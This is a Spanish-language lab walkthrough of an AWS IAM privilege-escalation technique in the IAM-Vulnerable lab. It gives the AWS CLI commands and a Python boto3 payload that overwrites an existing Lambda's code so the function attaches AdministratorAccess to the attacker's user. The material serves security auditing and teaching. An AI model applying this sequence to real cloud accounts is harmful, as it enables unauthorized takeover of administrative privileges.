EditExistingLambdaFunctionWithRole

Un atacante con el permiso lambda:UpdateFunctionCode podría actualizar el código en una función Lambda existente con un rol de IAM adjunto para que importara la biblioteca de AWS relevante en ese lenguaje de programación y la usara para realizar acciones en nombre de ese rol.

Luego del despliegue del laboratorio de IAM-Vulnerable, nos vamos a encontrar el siguiente usuario:

Este usuario tiene la siguiente política:

Este usuario tiene el siguiente rol:

Otra manera de validar lo anterior, es por medio del siguiente comando ya explicado:

Listando las políticas del usuario que será auditado:

aws iam list-attached-user-policies --user-name privesc17-EditExistingLambdaFunctionWithRole-user

Obteniendo información relevante para nuestra auditoria utilizando el ARN de la política del usuario auditado:

aws iam get-policy-version --policy-arn arn:aws:iam::037572360634:policy/privesc17-EditExistingLambdaFunctionWithRole --version-id v1

Para este escenario estaremos utilizando el siguiente rol:

Este rol será necesario para realizar la demostración de esta técnica y representará un rol privilegiado que será asociado a una lambda.

Para este escenario es necesario tener en nuestra infraestructura una lambda ya creada con cualquier funcionalidad integrada como, por ejemplo:

Y como se indicó previamente, esta lambda tendrá el rol llamado privesc-high-priv-service-role.

Ahora con nuestro usuario administrador, vamos a generar unas credenciales con STS sobre dicho usuario.

aws sts assume-role --role-arn arn:aws:iam::037572360634:role/privesc17-EditExistingLambdaFunctionWithRole-role --role-session-name privesc17

Por lo anterior, tenemos que autenticarnos con el comando aws configure y validar con el comando aws sts get-caller-identity.

aws configure --profile privesc17

El token se especificará dentro del archivo plano de credenciales.

aws sts get-caller-identity --profile privesc17

Si intentamos agregarnos al grupo de administradores, vamos a obtener un error de permisos:

aws iam add-user-to-group --group-name Group-Root-Spartan --user-name privesc17-EditExistingLambdaFunctionWithRole-user --profile privesc17

En este escenario, tenemos que aprovechar del privilegio de lambda:UpdateFunctionCode para actualizar una función de lambda existente y añadirle código malicioso encargado de adjuntar una política de altos privilegios a nuestro usuario inicial.

Nosotros estaremos utilizando el lenguaje de programación llamado Python y la librería boto3.

¿Qué es Boto3? Es una librería de python para facilitar la integración con los servicios de AWS (Amazon Web Services) tales como: S3, SES, DynamoDB, entre muchos otros.

Referencia para Boto3:

Inicialmente, vamos a enumerar nuestra lambda existente con el siguiente comando:

Para actualizar el código de la función Lambda, el nombre del archivo que contiene el código debe coincidir con el nombre del handler de la función del Lambda existente. Para este caso, podemos apreciar que el nombre del handler es lambda_function como se muestra en el resultado anterior. Por lo tanto, el nombre de nuestro archivo de código debe ser lambda_function.py:

El código malicioso de la lambda es el siguiente:

import boto3
def lambda_handler(event, context):
  client = boto3.client('iam')
  response = client.attach_user_policy(UserName='privesc17-EditExistingLambdaFunctionWithRole-user', PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess')
  return response

Tendremos que guardar este código en un archivo con el nombre: lambda_function.py

Posteriormente, tenemos que comprimir este script a un archivo comprimido llamado function.zip

Es importante resaltar, que debemos situarnos en el directorio que tiene alojado el archivo desde la terminal.

Para el próximo comando, estaremos actualizando el código de la lambda utilizando el script previamente indicado.

Ahora procedemos a actualizar una función de lambda con el siguiente comando:

aws lambda update-function-code --function-name FuncionHelloWorld --zip-file fileb://function.zip --profile privesc17

Cuando se ejecuta la función, se elevan los privilegios del atacante. Si el atacante tiene el permiso lambda:InvokeFunction, entonces es posible simplemente invocar la función directamente. De lo contrario, ocurrirá cuando otro usuario o servicio ejecute la función. En el siguiente ejemplo, otro usuario ejecuta la función.

El siguiente comando muestra a otro usuario de AWS invocando la lambda.

Tenga en cuenta, que en este comando falta el parámetro profile, lo que indica que esta ejecución se realizara utilizando otro usuario.

aws lambda invoke --function-name FuncionHelloWorld output.txt

Después de la invocación de la función de lambda, podemos revisar el contenido de nuestro archivo llamado output.txt

En la evidencia previa, podemos identificar el código HTTP 200 y esto significa que la petición fue realizada e interpretada de manera exitosa.

Para finalizar, vamos a validar los permisos para el usuario inicial:

Finalmente, hemos comprometido exitosamente un rol administrativo por medio de la técnica previamente explicada.

Última actualización

¿Te fue útil?